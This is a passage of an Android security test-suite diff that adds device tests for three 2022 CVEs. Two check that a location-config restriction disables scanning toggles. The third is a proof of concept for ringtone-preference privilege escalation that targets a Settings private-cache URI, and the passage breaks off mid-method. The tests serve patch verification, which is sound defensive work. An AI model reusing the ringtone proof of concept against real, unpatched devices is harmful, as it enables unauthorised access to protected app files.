+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/AndroidManifest.xml
new file mode 100644
index 00000000000..ec6a7752482
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2022_20348"
+ android:versionCode="1"
+ android:versionName="1.0">
+ <application>
+ <receiver android:name=".PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data android:name="android.app.device_admin"
+ android:resource="@xml/device_policies" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2022_20348" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/values/strings.xml
new file mode 100644
index 00000000000..e79968d7bb8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/values/strings.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <string name="wifiScanningPattern">.*wi.fi scanning.*</string>
+ <string name="wifiScanningTimedOut">Timed out waiting on the text \'Wi-fi scanning\' to appear
+ </string>
+ <string name="failMsg">Device is vulnerable to b/228315529 !!</string>
+ <string name="locationIntentAction">android.settings.LOCATION_SCANNING_SETTINGS</string>
+ <string name="resWifiScanning">android:id/title</string>
+ <string name="setUserRestrictionFailed">Failed to set user restriction
+ UserManager.DISALLOW_CONFIG_LOCATION</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/xml/device_policies.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/xml/device_policies.xml
new file mode 100644
index 00000000000..65ce601d65f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/res/xml/device_policies.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
+ <uses-policies>
+ </uses-policies>
+</device-admin>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/DeviceTest.java
new file mode 100644
index 00000000000..9cdb35d6704
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/DeviceTest.java
@@ -0,0 +1,115 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20348;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.os.UserManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Context mContext;
+ UiDevice mDevice;
+ DevicePolicyManager mDevicePolicyManager;
+ ComponentName mComponentName;
+ static final String USER_RESTRICTION = UserManager.DISALLOW_CONFIG_LOCATION;
+ static final int UI_TIMEOUT_MS = 5000;
+
+ String getStringRes(int key) {
+ return mContext.getResources().getString(key);
+ }
+
+ int getIntegerRes(int key) {
+ return mContext.getResources().getInteger(key);
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ /* Return to home screen after test */
+ mDevice.pressHome();
+
+ /*
+ * Clear user restriction "DISALLOW_CONFIG_LOCATION" set by the test and also clear the
+ * app as device owner.
+ */
+ mDevicePolicyManager.clearUserRestriction(mComponentName, USER_RESTRICTION);
+ mDevicePolicyManager.clearDeviceOwnerApp(mContext.getPackageName());
+ } catch (Exception e) {
+ // ignore the exception as the test is already complete
+ }
+ }
+
+ @Test
+ public void testWifiScanningDisallowed() {
+ try {
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ mContext = getApplicationContext();
+ mDevicePolicyManager = mContext.getSystemService(DevicePolicyManager.class);
+ mComponentName = new ComponentName(PocDeviceAdminReceiver.class.getPackage().getName(),
+ PocDeviceAdminReceiver.class.getName());
+ mDevicePolicyManager.addUserRestriction(mComponentName, USER_RESTRICTION);
+ UserManager userManager = mContext.getSystemService(UserManager.class);
+ assumeTrue(getStringRes(R.string.setUserRestrictionFailed),
+ userManager.getUserRestrictions().getBoolean(USER_RESTRICTION));
+
+ /* Start the window that contains option to toggle "Wi-Fi scanning" on/off */
+ Intent intent = new Intent(getStringRes(R.string.locationIntentAction));
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ /* Wait for the window that contains option to toggle "Wi-Fi scanning" */
+ Pattern wifiScanningPattern = Pattern
+ .compile(getStringRes(R.string.wifiScanningPattern), Pattern.CASE_INSENSITIVE);
+ boolean wifiScanningFound = mDevice.wait(Until.hasObject(
+ By.text(wifiScanningPattern).res(getStringRes(R.string.resWifiScanning))),
+ UI_TIMEOUT_MS);
+ assumeTrue(getStringRes(R.string.wifiScanningTimedOut), wifiScanningFound);
+
+ /*
+ * Check if the toggle "Wi-Fi scanning" is enabled, it is supposed to be disabled by
+ * the Device Admin in presence of fix
+ */
+ UiObject2 wifiScanningToggle = mDevice.findObject(
+ By.text(wifiScanningPattern).res(getStringRes(R.string.resWifiScanning)));
+ assertFalse(getStringRes(R.string.failMsg), wifiScanningToggle.isEnabled());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/PocDeviceAdminReceiver.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/PocDeviceAdminReceiver.java
new file mode 100644
index 00000000000..129a6b52dc8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20348/src/android/security/cts/CVE_2022_20348/PocDeviceAdminReceiver.java
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20348;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/Android.bp
new file mode 100644
index 00000000000..2accd9e4dc7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2022-20349",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/AndroidManifest.xml
new file mode 100644
index 00000000000..a59d1d14fd4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2022_20349"
+ android:versionCode="1"
+ android:versionName="1.0">
+ <application>
+ <receiver android:name=".PocDeviceAdminReceiver"
+ android:permission="android.permission.BIND_DEVICE_ADMIN"
+ android:exported="true">
+ <meta-data android:name="android.app.device_admin"
+ android:resource="@xml/device_policies" />
+ <intent-filter>
+ <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
+ </intent-filter>
+ </receiver>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2022_20349" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/values/strings.xml
new file mode 100644
index 00000000000..78fc6ccef47
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/values/strings.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <string name="btScanningPattern">.*bluetooth scanning.*</string>
+ <string name="btScanningTimedOut">Timed out waiting on the text \'Bluetooth scanning\' to appear
+ </string>
+ <string name="failMsg">Device is vulnerable to b/228315522 !!</string>
+ <string name="locationIntentAction">android.settings.LOCATION_SCANNING_SETTINGS</string>
+ <string name="resBtScanning">android:id/title</string>
+ <string name="setUserRestrictionFailed">Failed to set user restriction
+ UserManager.DISALLOW_CONFIG_LOCATION</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/xml/device_policies.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/xml/device_policies.xml
new file mode 100644
index 00000000000..65ce601d65f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/res/xml/device_policies.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
+ <uses-policies>
+ </uses-policies>
+</device-admin>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/DeviceTest.java
new file mode 100644
index 00000000000..b5083e9671f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/DeviceTest.java
@@ -0,0 +1,118 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20349;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.admin.DevicePolicyManager;
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.os.UserManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Context mContext;
+ UiDevice mDevice;
+ DevicePolicyManager mDevicePolicyManager;
+ ComponentName mComponentName;
+ static final String USER_RESTRICTION = UserManager.DISALLOW_CONFIG_LOCATION;
+ static final int UI_TIMEOUT_MS = 5000;
+
+ String getStringRes(int key) {
+ return mContext.getResources().getString(key);
+ }
+
+ int getIntegerRes(int key) {
+ return mContext.getResources().getInteger(key);
+ }
+
+ @After
+ public void tearDown() {
+ try {
+ /* Return to home screen after test */
+ mDevice.pressHome();
+
+ /*
+ * Clear user restriction "DISALLOW_CONFIG_LOCATION" set by the test and also clear the
+ * app as device owner.
+ */
+ mDevicePolicyManager.clearUserRestriction(mComponentName, USER_RESTRICTION);
+ mDevicePolicyManager.clearDeviceOwnerApp(mContext.getPackageName());
+ } catch (Exception e) {
+ // ignore the exception as the test is already complete
+ }
+ }
+
+ @Test
+ public void testBluetoothScanningDisallowed() {
+ try {
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ mContext = getApplicationContext();
+ mDevicePolicyManager =
+ mContext.getSystemService(DevicePolicyManager.class);
+ mComponentName =
+ new ComponentName(PocDeviceAdminReceiver.class.getPackage().getName(),
+ PocDeviceAdminReceiver.class.getName());
+ mDevicePolicyManager.addUserRestriction(mComponentName, USER_RESTRICTION);
+ UserManager userManager = mContext.getSystemService(UserManager.class);
+ assumeTrue(getStringRes(R.string.setUserRestrictionFailed),
+ userManager.getUserRestrictions().getBoolean(USER_RESTRICTION));
+
+ /* Start the window that contains option to toggle "Bluetooth scanning" on/off */
+ Intent intent = new Intent(getStringRes(R.string.locationIntentAction));
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ /* Wait for the window that contains option to toggle "Bluetooth scanning" */
+ Pattern btScanningPattern = Pattern.compile(getStringRes(R.string.btScanningPattern),
+ Pattern.CASE_INSENSITIVE);
+ boolean btScanningFound = mDevice.wait(
+ Until.hasObject(
+ By.text(btScanningPattern).res(getStringRes(R.string.resBtScanning))),
+ UI_TIMEOUT_MS);
+ assumeTrue(getStringRes(R.string.btScanningTimedOut), btScanningFound);
+
+ /*
+ * Check if the toggle "Bluetooth scanning" is enabled, it is supposed to be disabled by
+ * the Device Admin in presence of fix
+ */
+ UiObject2 btScanningToggle = mDevice.findObject(
+ By.text(btScanningPattern).res(getStringRes(R.string.resBtScanning)));
+ assertFalse(getStringRes(R.string.failMsg), btScanningToggle.isEnabled());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/PocDeviceAdminReceiver.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/PocDeviceAdminReceiver.java
new file mode 100644
index 00000000000..145307126e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20349/src/android/security/cts/CVE_2022_20349/PocDeviceAdminReceiver.java
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20349;
+
+import android.app.admin.DeviceAdminReceiver;
+
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/Android.bp
new file mode 100644
index 00000000000..37d35eb74f2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2022-20353",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/AndroidManifest.xml
new file mode 100644
index 00000000000..d4129ac8823
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/AndroidManifest.xml
@@ -0,0 +1,35 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2022_20353">
+ <application
+ android:label="@string/appName"
+ android:supportsRtl="true">
+ <activity
+ android:name=".PocActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.RINGTONE_PICKER" />
+ <category android:name="android.intent.category.DEFAULT" />
+ </intent-filter>
+ </activity>
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2022_20353" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/integers.xml
new file mode 100644
index 00000000000..3207c29a0bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/integers.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <integer name="assumptionFailure">-1</integer>
+ <integer name="success">0</integer>
+ <integer name="timeoutMs">20000</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/strings.xml
new file mode 100644
index 00000000000..27e87f65446
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/res/values/strings.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2022 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="alwaysButtonId">android:id/button_always</string>
+ <string name="appName">CVE-2022-20353</string>
+ <string name="defaultSemaphoreMsg">Could not get message key in shared preferences</string>
+ <string name="failureMessage">
+ Device is vulnerable to b/221041256!! Privilege escalation possible in
+ com.android.settings.DefaultRingtonePreference
+ </string>
+ <string name="fileName">NOTICE.html</string>
+ <string name="getRingtoneCmd">settings get system ringtone</string>
+ <string name="messageKey">message</string>
+ <string name="noticeUri">
+ content://com.android.settings.files/my_cache/NOTICE.html
+ </string>
+ <string name="resType">string</string>
+ <string name="resultKey">result</string>
+ <string name="setRingtoneCmd">settings put system ringtone</string>
+ <string name="sharedPreferences">sharedPreferences</string>
+ <string name="textResId">ringtone_title</string>
+ <string name="uiObjectNotFoundMsg">Unable to find UiObject with %1$s text/id</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/DeviceTest.java
new file mode 100644
index 00000000000..af1f9782ab0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2022-20353/src/android/security/cts/CVE_2022_20353/DeviceTest.java
@@ -0,0 +1,151 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2022_20353;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.SharedPreferences;
+import android.content.SharedPreferences.OnSharedPreferenceChangeListener;
+import android.content.res.Resources;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiScrollable;
+import androidx.test.uiautomator.UiSelector;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Resources mResources;
+ UiDevice mDevice;
+ Context mContext;
+
+ // Wait for UiObject to appear and click on the UiObject if it is visible
+ private boolean clickUiObject(BySelector selector) {
+ boolean objectFound =
+ mDevice.wait(Until.hasObject(selector), mResources.getInteger(R.integer.timeoutMs));
+ if (objectFound) {
+ mDevice.findObject(selector).click();
+ }
+ return objectFound;
+ }
+
+ @Test
+ public void testDefaultRingtonePreference() {
+ String defaultRingtone = null;
+ try {
+ mDevice = UiDevice.getInstance(getInstrumentation());
+ mContext = getInstrumentation().getContext();
+ mResources = mContext.getResources();
+ defaultRingtone =
+ mDevice.executeShellCommand(mContext.getString(R.string.getRingtoneCmd));
+
+ Intent intent = new Intent(Settings.ACTION_SOUND_SETTINGS);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ mContext.startActivity(intent);
+
+ String settingsPackageName =
+ intent.resolveActivity(mContext.getPackageManager()).getPackageName();
+ Context settingsContext = mContext.createPackageContext(settingsPackageName,
+ Context.CONTEXT_IGNORE_SECURITY);
+ Resources res = settingsContext.getPackageManager()
+ .getResourcesForApplication(settingsPackageName);
+ String text = settingsContext
+ .getString(res.getIdentifier(mContext.getString(R.string.textResId),
+ mContext.getString(R.string.resType), settingsPackageName));
+ // scroll until text 'Phone ringtone' is visible
+ UiScrollable uiScrollable = new UiScrollable(new UiSelector().scrollable(true));
+ uiScrollable.scrollTextIntoView(text);
+ // click on 'Phone ringtone'
+ BySelector selector = By.text(text);
+ assumeTrue(mContext.getString(R.string.uiObjectNotFoundMsg, text),
+ clickUiObject(selector));
+ // select CTS PoC app
+ text = mContext.getString(R.string.appName);
+ selector = By.text(text);
+ assumeTrue(mContext.getString(R.string.uiObjectNotFoundMsg, text),
+ clickUiObject(selector));
+ // select 'Always'
+ String resId = mContext.getString(R.string.alwaysButtonId);
+ selector = By.res(resId);
+ assumeTrue(mContext.getString(R.string.uiObjectNotFoundMsg, resId),
+ clickUiObject(selector));
+
+ SharedPreferences sharedPrefs = mContext.getSharedPreferences(
+ mContext.getString(R.string.sharedPreferences), Context.MODE_APPEND);
+ Semaphore preferenceChanged = new Semaphore(0);
+ OnSharedPreferenceChangeListener sharedPrefListener =
+ new OnSharedPreferenceChangeListener() {
+ @Override
+ public void onSharedPreferenceChanged(SharedPreferences sharedPreferences,
